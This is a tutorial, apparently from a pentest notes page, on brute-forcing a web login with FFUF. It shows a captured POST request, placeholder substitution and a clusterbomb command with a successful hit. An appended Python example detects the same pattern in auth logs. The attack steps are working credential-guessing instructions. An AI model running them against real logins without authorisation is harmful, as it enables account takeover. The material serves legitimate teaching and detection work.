
Use FFUF to Brute Force Login



Brute Force with a Request File

  1. Start Burp
  2. Submit a login with arbitrary credentials on the target web page so that Burp captures the request
  3. Copy the captured request, for example:
POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"username":"admin","password":"admin"}
  4. Paste the contents into a file, for example request.txt
  5. Replace the fields with placeholder text
POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"username":"USERFUZZ","password":"PASSFUZZ"}
  6. Save these contents to a file
  7. Run FFUF in clusterbomb mode to brute force the login
ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200

[Status: 200, Size: 2, Words: 1, Lines: 1]
    * USERFUZZ: admin
    * PASSFUZZ: password

In this example, we are doing the following:

  • -request request.txt is the example request for FFUF to follow
  • -request-proto http is the protocol to use with the raw request
  • -mode clusterbomb uses clusterbomb mode, which tries every combination of the given inputs
  • -w /path/to/users/file.txt:USERFUZZ inserts the words from this word list in the "username":"USERFUZZ" placeholder
  • -w /path/to/password/file.txt:PASSFUZZ inserts the words from this word list in the "password":"PASSFUZZ" placeholder
  • -mc 200 matches responses with the HTTP 200 status code, which successful logins return
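
Seen from the target's side, a clusterbomb run appears as one source failing logins across several usernames in a short window. The following added example (not from the original page or from the FFUF project) flags that pattern in constructed application auth events; the JSON field names, source addresses and thresholds are assumptions.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

def sample_events():
    """Constructed auth events for POST /login, one JSON object per line.
    Field names (ts, src, user, ok) are assumptions for this example."""
    base, lines = datetime(2024, 1, 1, 12, 0, 0), []
    def add(offset, src, user, ok):
        ts = (base + timedelta(seconds=offset)).isoformat()
        lines.append(json.dumps({"ts": ts, "src": src, "user": user, "ok": ok}))
    # One source walking 3 usernames x 4 passwords; one guess succeeds.
    n = 0
    for user in ("admin", "root", "guest"):
        for attempt in range(4):
            add(n, "10.10.10.99", user, user == "admin" and attempt == 3)
            n += 1
    # An ordinary user who mistypes once and then logs in.
    add(5, "10.10.10.20", "alice", False)
    add(9, "10.10.10.20", "alice", True)
    return lines

def detect(lines, window=timedelta(seconds=60), min_failures=8, min_users=2):
    """Flag sources with >= min_failures failed logins against >= min_users
    distinct usernames inside one sliding window."""
    by_src = defaultdict(list)
    for line in lines:
        e = json.loads(line)
        by_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e["user"], e["ok"]))
    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1  # drop events older than the window
            fails = [e for e in evs[start:end + 1] if not e[2]]
            users = sorted({e[1] for e in fails})
            if len(fails) >= min_failures and len(users) >= min_users:
                # Accounts this source got into at any time: reset these first.
                hit = sorted({e[1] for e in evs if e[2]})
                findings[src] = {"failures": len(fails), "users": users, "succeeded": hit}
                break
    return findings

if __name__ == "__main__":
    for src, info in detect(sample_events()).items():
        print(src, info)
```

The "succeeded" list matters most during response: a 200 on /login from a flagged source marks an account whose credentials should be rotated.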